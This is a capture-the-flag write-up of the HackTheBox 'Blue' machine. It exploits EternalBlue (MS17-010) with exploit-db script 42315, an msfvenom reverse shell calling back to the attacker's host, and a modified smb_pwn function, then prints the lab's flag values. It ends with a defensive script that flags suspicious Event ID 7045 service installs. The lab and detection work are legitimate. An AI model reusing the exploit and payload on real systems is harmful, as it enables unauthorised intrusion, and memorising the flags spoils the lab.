HackTheBox Blue
Writeup for HackTheBox Blue
Machine Synopsis
Blue, while possibly the most simple machine on Hack The Box, demonstrates the severity of the EternalBlue exploit, which has been used in multiple large-scale ransomware and crypto-mining attacks since it was leaked publicly. (Source)
Enumeration
$ nmap -sC -sV -A 10.10.10.40
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-02-09T04:45:21
|_ start_date: 2022-02-09T04:43:42
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-02-09T04:45:22+00:00
|_clock-skew: mean: 3s, deviation: 2s, median: 2s
It seems like there is no website for this challenge. Let's run nmap with --script=vuln to check for any low-hanging fruit.
$ nmap --script=vuln 10.10.10.40
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
This machine is vulnerable to the infamous MS17-010 EternalBlue.
Exploitation
$ searchsploit --id ms17-010
...
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | 42031
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Exe | 42315
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS | 42030
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution | 41987
...
$ searchsploit -m 42315
Reading the source code shows that we need to download mysmb.py from this link.
$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py
$ mv 42315.py mysmb.py
Looking further through the source code, it shows that we need a username and password. We can use enum4linux to try and enumerate some information from the Windows machine.
$ enum4linux -a 10.10.10.40
==========================
| Target Information |
==========================
Target ........... 10.10.10.40
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
... [Other information that is not needed]
The guest account is enabled. We can add the guest account to the exploit code.
USERNAME = 'guest'
PASSWORD = ''
Now, we need to create a reverse shell payload using msfvenom.
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1234 -f exe > exploit.exe
Adjust the following part of the exploit code of 42315.py.
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    print('creating file c:\\exploit.exe on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/exploit.exe')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

    # Send reverse shell payload
    smb_send_file(smbConn, '/home/shiro/HackTheBox/Blue/exploit.exe', 'C', '/exploit.exe')
    # Execute the reverse shell payload
    service_exec(conn, r'cmd /c c:\exploit.exe')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."
Execute the exploit and get the reverse shell!
$ python 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: samr
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
...
Opening SVCManager on 10.10.10.40.....
Creating service cFsa.....
Starting service cFsa.....
The NETBIOS connection with the remote host timed out.
Removing service cFsa.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.40] 49161
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Users>cd "C:\Users\haris\Desktop"
C:\Users\haris\Desktop>type user.txt
4c546aea7dbee75cbd71de245c8deea9
C:\Users\haris\Desktop>cd "C:\Users\Administrator\Desktop"
C:\Users\Administrator\Desktop>type root.txt
ff548eb71e920ff6c08843ce9df4e717
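From the defender's side, the "Opening SVCManager ... Creating service cFsa ... Starting service cFsa" lines above are the trace the exploit leaves on the target: every service install is recorded in the Windows System log as Event ID 7045 together with the service name and its command line. As an added example (not part of the original writeup), this Python triage runs over constructed 7045 records and flags the two traits visible in the output above, a short randomly named service and a cmd /c wrapper launching a binary from the drive root; the record layout and the name-length threshold are assumptions.

```python
import re

# Constructed sample records modelled on Windows System log Event ID 7045
# ("A service was installed in the system"); field names follow that
# event's EventData schema, the values are invented for this example.
SAMPLE_EVENTS = [
    {"ServiceName": "cFsa", "ImagePath": r"cmd /c c:\exploit.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "gupdate",
     "ImagePath": r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc',
     "AccountName": "LocalSystem"},
]

# A service command that is a shell wrapper (cmd /c ...) instead of a service
# binary is the pattern left behind by service-based remote execution.
SHELL_WRAPPER = re.compile(r"^(?:cmd(?:\.exe)?|%COMSPEC%)\s+/[ck]\s+", re.IGNORECASE)
# An executable sitting directly in a drive root (e.g. C:\something.exe),
# optionally quoted, followed by whitespace or the end of the command.
ROOT_BINARY = re.compile(r'^"?[A-Za-z]:\\[^\\"]+\.exe"?(?:\s|$)', re.IGNORECASE)
# Four-letter names like "cFsa" are what generated service names tend to
# look like; the length threshold is an assumption for this example.
RANDOM_NAME = re.compile(r"^[A-Za-z]{4}$")


def triage_service_install(event):
    """Return the reasons a 7045 record looks like remote service execution."""
    reasons = []
    name = event["ServiceName"]
    command = event["ImagePath"].strip()
    wrapper = SHELL_WRAPPER.match(command)
    if wrapper:
        reasons.append("command is a cmd /c wrapper, not a service binary")
        command = command[wrapper.end():]  # inspect what cmd was asked to run
    if ROOT_BINARY.match(command):
        reasons.append("binary runs from a drive root rather than an install path")
    if RANDOM_NAME.match(name):
        reasons.append("four-letter service name resembles a generated name")
    return reasons


def triage_all(events):
    """Map each service name to its triage reasons (empty list = no findings)."""
    return {e["ServiceName"]: triage_service_install(e) for e in events}


if __name__ == "__main__":
    for name, reasons in triage_all(SAMPLE_EVENTS).items():
        print(name, "->", reasons or "no findings")
```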